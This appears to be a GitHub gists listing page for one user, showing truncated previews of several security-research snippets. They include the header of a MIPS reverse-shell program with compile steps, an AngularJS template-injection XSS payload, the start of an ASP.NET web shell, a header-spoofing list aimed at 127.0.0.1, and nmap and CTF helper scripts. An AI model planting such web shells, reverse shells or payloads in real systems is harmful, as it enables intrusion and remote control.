numanturle
/ shellcode.c
Created
February 25, 2022 22:14
reference : https://east-trowel-102.notion.site/CVE-2021-XXXX-rce-via-crafted-payload-in-an-ipv6-address-input-field-hidden-EN-98e24b6f841043fba17ec4627c34f5d1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Simple Persistent Reverse Shell | |
| // Compile for MIPSBE using the following steps: | |
| // 1) cp reverse_shell_mipsbe.c /tmp/ | |
| // 2) using buildroot toolchain for compile mipsel-buildroot-linux-uclibc-gcc-10.3.0 | |
| // 4) cd /tmp ; output/host/bin/mipsel-buildroot-linux-uclibc-gcc-10.3.0 -static /home/sasaga/Escritorio/shellcode/rev.c -o /home/sasaga/Escritorio/shellcode/rev | |
| // Outside Docker: | |
| // 5) cp /tmp/rev . | |
| #include <sys/types.h> | |
| #include <sys/socket.h> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| {{x={"n":"".constructor.prototype};x["n"].charAt=[].join;$eval("x=alert(\"pwned --> numanturle\")");}} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| import argparse | |
| import xml.etree.ElementTree as ET | |
| def main(argv): | |
| inputfile = '' | |
| outputfile = '' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $ac = file(trim($argv[1])); | |
| $start = 0; | |
| $sonuc = []; | |
| $son_ip = ""; | |
| foreach($ac as $satir){ | |
| if(strstr($satir, "Nmap scan report for")){ | |
| $start = 1; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import sys | |
| import argparse | |
| import xml.etree.ElementTree as ET | |
| def main(argv): | |
| inputfile = '' | |
| outputfile = '' |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $db_name = "MalwareURLs.txt" | |
| if (!(Test-Path $db_name)) | |
| { | |
| New-Item -name $db_name -type "file" -value | |
| Write-Output "Created new file and text content added" | |
| } | |
| $url_list = @( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <%@ Page Language="C#" EnableViewState="false" %> | |
| <%@ Import Namespace="System.Web.UI.WebControls" %> | |
| <%@ Import Namespace="System.Diagnostics" %> | |
| <%@ Import Namespace="System.IO" %> | |
| <% | |
| string outstr = ""; | |
| string dir = Page.MapPath(".") + "/"; | |
| if (Request.QueryString["fdir"] != null) | |
| dir = Request.QueryString["fdir"] + "/"; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $ac = file("kapsam.txt"); | |
| foreach($ac as $x){ | |
| $x = trim($x); | |
| $x = str_replace(["https://","http://","www.","/"],"",$x); | |
| $sdip = gethostbynamel($x); | |
| if(isset($sdip[0])){ | |
| echo $sdip[0].PHP_EOL; | |
| }else { | |
| echo "IP COZUMLENMEDI".PHP_EOL; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Base-Url: 127.0.0.1 | |
| Client-IP: 127.0.0.1 | |
| Http-Url: 127.0.0.1 | |
| Proxy-Host: 127.0.0.1 | |
| Proxy-Url: 127.0.0.1 | |
| Real-Ip: 127.0.0.1 | |
| Redirect: 127.0.0.1 | |
| Referer: 127.0.0.1 | |
| Referrer: 127.0.0.1 | |
| Refferer: 127.0.0.1 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from solcx import compile_source | |
| from web3 import Web3 | |
| setup_txt = open("Setup.sol", "r").read() | |
| setup_compiled_source = compile_source(setup_txt, output_values=['abi']) | |
| setup_abi = list(setup_compiled_source.items())[0][1]['abi'] | |
| random_txt = open("Random.sol", "r").read() | |
| random_compiled_source = compile_source(random_txt, output_values=['abi']) | |
| random_abi = list(random_compiled_source.items())[0][1]['abi'] |